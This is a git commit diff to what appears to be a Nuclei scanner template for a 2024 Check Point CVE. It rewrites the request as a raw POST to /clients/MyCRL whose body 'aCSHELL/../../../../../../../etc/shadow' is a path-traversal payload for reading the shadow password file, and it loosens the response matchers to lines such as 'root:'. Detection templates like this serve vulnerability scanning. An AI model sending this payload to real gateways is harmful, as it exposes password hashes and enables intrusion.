matcher - update

patch-3
pussycat0x 2024-05-30 10:22:03 +05:30
parent 90fa6e4bb7
commit fb94f652fd
1 changed files with 9 additions and 11 deletions

View File

@ -15,24 +15,22 @@ info:
tags: cve,cve2024,checkpoint
http:
- method: POST
path:
- "{{BaseURL}}/clients/MyCRL"
- raw:
- |
POST /clients/MyCRL HTTP/1.1
Host: {{Hostname}}
body: 'aCSHELL/../../../../../../../etc/shadow'
aCSHELL/../../../../../../../etc/shadow
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "monitor:\\*:"
- "root:\\*:"
- "cp_routeevt:\\*:"
- "cp_postgres:\\*:"
- "cp_extensions:\\*:"
- "cpep_user:\\*:"
- "root:"
- "nobody:"
conditio: and
- type: status
status:
- 200
- 200